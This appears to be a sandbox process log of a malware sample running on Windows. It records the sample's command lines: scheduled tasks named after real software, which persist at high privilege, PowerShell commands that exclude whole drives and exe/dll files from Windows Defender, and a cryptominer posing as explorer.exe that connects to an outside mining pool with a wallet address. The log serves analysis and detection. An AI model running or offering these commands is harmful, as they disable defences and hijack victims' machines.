"msiexec" /i "C:\Users\Admin\AppData\Local\Temp\node-v18.16.0-x64.msi" /qn

C:\Windows\system32\msiexec.exe

C:\Windows\system32\msiexec.exe /V

C:\Windows\system32\CMD.exe

"CMD" /C SchTaSKs /CrEAte /F /sc OnLoGoN /rl HighEst /tn "Autodesk Maya" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /CrEAte /F /sc OnLoGoN /rl HighEst /tn "Autodesk Maya" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe"

C:\Windows\system32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\system32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo 5 /tn "Google Chrome Update" /tr "C:\Users\Admin\Music\xdwdAdobe Illustrator.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo 5 /tn "Google Chrome Update" /tr "C:\Users\Admin\Music\xdwdAdobe Illustrator.exe" /RL HIGHEST

C:\Windows\System32\conhost.exe

"C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\Bloxstrap.exe"

C:\Windows\System32\cmd.exe

"cmd" cmd /c powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"

C:\Windows\system32\MsiExec.exe

C:\Windows\system32\MsiExec.exe -Embedding 24DB5C81B615D0AD00A42217A5D9562F

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force"

C:\Windows\System32\cmd.exe

"cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "Bloxstrap" /tr "C:\Users\Admin\Bloxstrap.exe"

C:\Windows\system32\schtasks.exe

schtasks /create /f /sc onlogon /rl highest /tn "Bloxstrap" /tr "C:\Users\Admin\Bloxstrap.exe"

C:\Windows\syswow64\MsiExec.exe

C:\Windows\syswow64\MsiExec.exe -Embedding C1A7B264966EDDF33BCF128627D0C296

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1192 -s 1656

C:\Windows\system32\wbem\WmiApSrv.exe

C:\Windows\system32\wbem\WmiApSrv.exe

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\winNet\rsH0xIUsPk2E2Mq2a4QwbDGWD6K8lz.bat" "

C:\winNet\ComContainerbrowserRefRuntime.exe

"C:\winNet/ComContainerbrowserRefRuntime.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\0lbrM5rdln.bat"

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\system32\w32tm.exe

w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2

C:\Windows\system32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\DriversavessessionDlldhcp\exFbRiwQoowToPhSTKSA9iYE.bat" "

C:\DriversavessessionDlldhcp\Roblox.exe

"C:\DriversavessessionDlldhcp/Roblox.exe"

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "RobloxR" /sc MINUTE /mo 5 /tr "'C:\Users\Admin\AppData\Local\Roblox.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "Roblox" /sc ONLOGON /tr "'C:\Users\Admin\AppData\Local\Roblox.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "RobloxR" /sc MINUTE /mo 12 /tr "'C:\Users\Admin\AppData\Local\Roblox.exe'" /rl HIGHEST /f

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\ltcsaawt\ltcsaawt.cmdline"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESEDF.tmp" "c:\MSOCache\All Users\{90140000-00A1-0409-0000-0000000FF1CE}-C\CSC37168581A8D94A6C84CFBC64B17B38F4.TMP"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\a2winfxb\a2winfxb.cmdline"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESF4C.tmp" "c:\Users\Admin\Music\CSC6D5C1AFCD1984D5EBFD1EC6CEC5D8814.TMP"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\zo10lvbw\zo10lvbw.cmdline"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES1056.tmp" "c:\Windows\AppPatch\ja-JP\CSCC375D023683141EC9126F98C4EDA9BAD.TMP"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\3q4jp1de\3q4jp1de.cmdline"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES10B3.tmp" "c:\Recovery\7da403a2-3a8c-11ef-b191-d685e2345d05\CSCA59D324A68AE4B22A6E15266FD9E16AA.TMP"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\q01gslrh\q01gslrh.cmdline"

C:\Windows\system32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES1130.tmp" "c:\Program Files (x86)\Common Files\DESIGNER\CSCF7CCF5184CCC4DE8B28EE88B3840D7E9.TMP"

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\hcjwnium\hcjwnium.cmdline"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES11CC.tmp" "c:\DriversavessessionDlldhcp\CSC559EE64D83AC4A8280A5A24C5B60E145.TMP"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\flnbjk2l\flnbjk2l.cmdline"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES1297.tmp" "c:\MSOCache\All Users\CSCF356FD83CFB9430EA0EF1F52A39F846.TMP"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\4veo0d4h\4veo0d4h.cmdline"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES1304.tmp" "c:\Windows\twain_32\CSC9A457BE89CBC4F64AC68B4421A86AF34.TMP"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\l5rfmmif\l5rfmmif.cmdline"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES1381.tmp" "c:\Program Files (x86)\Windows Portable Devices\CSC8EB735E73C8240119DE82E7875807925.TMP"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\kqleqlab\kqleqlab.cmdline"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES13CF.tmp" "c:\Users\All Users\Microsoft\Windows\CSC13970AFFC3FB4AE3A9F39E5D723D41AB.TMP"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\aryds0rx\aryds0rx.cmdline"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES141D.tmp" "c:\MSOCache\All Users\{90140000-0044-0409-0000-0000000FF1CE}-C\CSC1DB539DCA86D44AD86BABAAFDEA71AB9.TMP"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\j10hzyo0\j10hzyo0.cmdline"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES147A.tmp" "c:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\CSC47ECE852170F480E91EA1B84FE8DFF.TMP"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\xq3esore\xq3esore.cmdline"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES14E8.tmp" "c:\Users\Admin\Music\CSC9B0B8199D9CF45F6B333935465BB2D70.TMP"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\4yeijp43\4yeijp43.cmdline"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES1545.tmp" "c:\Windows\System32\CSC651989FCF30C4F4A86B7699D8127553D.TMP"

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "RobloxR" /sc MINUTE /mo 14 /tr "'C:\DriversavessessionDlldhcp\Roblox.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "Roblox" /sc ONLOGON /tr "'C:\DriversavessessionDlldhcp\Roblox.exe'" /rl HIGHEST /f

C:\winNet\WerFault.exe

"C:\winNet\WerFault.exe"

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "RobloxR" /sc MINUTE /mo 9 /tr "'C:\DriversavessessionDlldhcp\Roblox.exe'" /rl HIGHEST /f

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/$Recycle.Bin/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Documents and Settings/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/DriversavessessionDlldhcp/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/MSOCache/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/PerfLogs/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files (x86)/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/ProgramData/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Recovery/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/System Volume Information/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Users/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Windows/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/winNet/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Roblox.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:\DriversavessessionDlldhcp\Roblox.exe'

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "909049509-6533765031900255637-2070495065-305685155-1046318106-855059111423792356"

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "6937931028219448122055107728-1831467133735503772-661204874-1257183238690169128"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\VyvJW8hwqz.bat"

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\system32\w32tm.exe

w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2

C:\Windows\system32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\System32\cmd.exe

"cmd" cmd /c "C:\Users\Admin\Bloxstrap.exe"

C:\Users\Admin\Bloxstrap.exe

C:\Users\Admin\Bloxstrap.exe

C:\Windows\system32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\Users\Admin\AppData\Local\Roblox.exe

"C:\Users\Admin\AppData\Local\Roblox.exe"

C:\Windows\system32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\system32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\system32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\system32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\System32\conhost.exe

"C:\Windows\System32\conhost.exe" "C:\Users\Admin\Bloxstrap.exe"

C:\Windows\System32\cmd.exe

"cmd" cmd /c powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"

C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe

"C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"

C:\Windows\explorer.exe

C:\Windows\explorer.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=pool.hashvault.pro:80 --user=43a4sKqYaYRDJ11nnS8kk6ATe7pwz7GqaGCjueKKVcqS8V7ZgQduYQSENk7PRNr1FjgxF7TADqsRBjA5cMsYJeovSPcRAnK --pass=x --cpu-max-threads-hint=30 --cinit-stealth-targets="+iU/trnPCTLD3p+slbva5u4EYOS6bvIPemCHGQx2WRUcnFdomWh6dhl5H5KbQCjp6yCYlsFu5LR1mi7nQAy56B+5doUwurAPvCael2sR/N4=" --cinit-idle-wait=2 --cinit-idle-cpu=90 --tls --cinit-stealth

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force"

C:\Windows\system32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\system32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\system32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\system32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\System32\conhost.exe

"C:\Windows\System32\conhost.exe" "/sihost64"

C:\Windows\system32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\system32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\system32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\system32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\system32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\system32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\system32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\system32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\system32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\system32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\system32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\system32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\system32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\system32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\system32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

